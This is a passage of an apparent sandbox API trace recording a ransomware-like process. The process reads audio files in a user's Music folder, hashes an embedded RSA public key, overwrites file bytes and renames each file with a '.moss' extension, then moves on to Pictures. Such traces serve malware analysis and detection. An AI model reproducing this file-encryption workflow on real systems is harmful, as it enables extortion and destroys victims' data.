szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.703] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.703] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.703] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.703] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.703] GetLastError () returned 0x0 [0171.703] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.703] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.703] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.703] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.703] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.703] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.704] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.704] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5739, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.704] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.709] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\RvIelPYu4g 0l9vjosa.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\rvielpyu4g 0l9vjosa.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\RvIelPYu4g 0l9vjosa.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\rvielpyu4g 0l9vjosa.mp3.moss")) returned 1 [0171.711] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\TefnYihKIGC8R2AWa-T.mp3") returned=".mp3" [0171.711] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\TefnYihKIGC8R2AWa-T.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\tefnyihkigc8r2awa-t.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.711] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=71807) returned 1 [0171.711] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.715] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x11859, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.715] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.716] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.716] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x1187f, lpOverlapped=0x0) returned 1 [0171.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.717] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.717] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.717] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.718] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.718] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.718] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.718] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.718] GetLastError () returned 0x0 [0171.718] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.719] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.719] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.719] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.719] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.719] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.720] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1187f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.720] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.720] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\TefnYihKIGC8R2AWa-T.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\tefnyihkigc8r2awa-t.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\TefnYihKIGC8R2AWa-T.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\tefnyihkigc8r2awa-t.mp3.moss")) returned 1 [0171.722] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\vwZ8E.wav") returned=".wav" [0171.723] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\vwZ8E.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\vwz8e.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.723] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=56791) returned 1 [0171.723] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.727] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xddb1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.727] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.748] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xddd7, lpOverlapped=0x0) returned 1 [0171.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.748] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.748] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.749] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.749] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.750] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.750] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.750] GetLastError () returned 0x0 [0171.750] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.750] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.750] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.750] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.750] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.750] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.751] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xddd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.751] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.751] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\vwZ8E.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\vwz8e.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\vwZ8E.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\vwz8e.wav.moss")) returned 1 [0171.754] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\VyO0yiFTvgQQDq.wav") returned=".wav" [0171.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\VyO0yiFTvgQQDq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\vyo0yiftvgqqdq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.754] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=98922) returned 1 [0171.755] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.757] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x18244, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.757] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.758] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.758] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x1826a, lpOverlapped=0x0) returned 1 [0171.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.760] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.760] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.762] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.762] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.762] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.762] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.762] GetLastError () returned 0x0 [0171.762] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.762] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.762] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.762] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.762] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.762] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.762] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.763] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1826a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.763] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.763] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\VyO0yiFTvgQQDq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\vyo0yiftvgqqdq.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\VyO0yiFTvgQQDq.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lv2x09a0om561\\vyo0yiftvgqqdq.wav.moss")) returned 1 [0171.765] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.765] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0171.765] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0171.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.765] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\") returned="612n\\" [0171.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0171.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0171.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0171.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b50d28 [0171.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0171.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0171.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b50d28 | out: hHeap=0xcd0000) returned 1 [0171.766] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.766] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.766] PathFindFileNameW (pszPath="") returned="" [0171.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ad0 [0171.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2555e30, ftCreationTime.dwHighDateTime=0x1d5e5ba, ftLastAccessTime.dwLowDateTime=0x18dafeb0, ftLastAccessTime.dwHighDateTime=0x1d5e131, ftLastWriteTime.dwLowDateTime=0x18dafeb0, ftLastWriteTime.dwHighDateTime=0x1d5e131, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71ad0 | out: hHeap=0xcd0000) returned 1 [0171.766] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: 